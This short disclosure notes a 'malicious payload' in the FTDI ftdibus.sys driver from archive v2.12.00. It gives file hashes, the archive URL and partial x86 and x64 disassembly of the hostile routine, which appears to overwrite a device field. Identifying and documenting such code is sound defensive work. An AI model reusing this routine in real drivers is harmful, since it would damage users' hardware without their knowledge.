archive v2.12.00 url http://www.ftdichip.com/Drivers/CDM/CDM%20v2.12.00%20WHQL%20Certified.zip MD5 ec49ac0f21d6edec4b539f64a0335073 SHA-1 111debe3a12afb7085f064ed7db88626b4c943f4 malicious payload (located by @marcan42 https://twitter.com/marcan42/status/525202516816842752) located in file: ftdibus.sys x86 version MD5 50266c815612f573542e4f14c6a0b4e9 sha-1 0087df66177e36db802def36a05c9789b3a76b0e code: 11718: 8BFF mov edi,edi 1171A: 55 push ebp 1171B: 8BEC mov ebp,esp 1171D: 51 push ecx 1171E: 53 push ebx 1171F: 56 push esi 11720: 57 push edi 11721: 8B7D08 mov edi,[ebp][8] 11724: 8D45FC lea eax,[ebp][-4] 11727: 50 push eax 11728: FFB7D0070000 push d,[edi][0000007D0] 1172E: E893720000 call .0000189C6 11733: 6A77 push 077 11735: FFB7D0070000 push d,[edi][0000007D0] 1173B: E8E0710000 call .000018920 --?2 11740: 8B750C mov esi,[ebp][00C] 11743: 0FB7467C movzx eax,w,[esi][07C] 11747: 0FB75E04 movzx ebx,w,[esi][4] 1174B: 89450C mov [ebp][00C],eax 1174E: 33C0 xor eax,eax 11750: 56 push esi 11751: 66894604 mov [esi][4],ax 11755: E83EFFFFFF call .000011698 x64 version MD5 13799cb7521a39724ffdea2e5d9c8305 SHA1 9569093d795827dc6190e112130d780ee087db1d code: 12B0C: 48895C2410 mov [rsp][010],rbx 12B11: 48896C2418 mov [rsp][018],rbp 12B16: 56 push rsi 12B17: 57 push rdi 12B18: 4154 push r12 12B1A: 4883EC40 sub rsp,040 12B1E: 488BF9 mov rdi,rcx 12B21: 488B89C00A0000 mov rcx,[rcx][000000AC0] 12B28: 488BDA mov rbx,rdx 12B2B: 488D542460 lea rdx,[rsp][060] 12B30: E8DB7B0000 call .00001A710 12B35: 488B8FC00A0000 mov rcx,[rdi][000000AC0] 12B3C: B277 mov dl,077 12B3E: E8D57A0000 call .00001A618 Archive v2.10.00 doesn't seem to contain that code.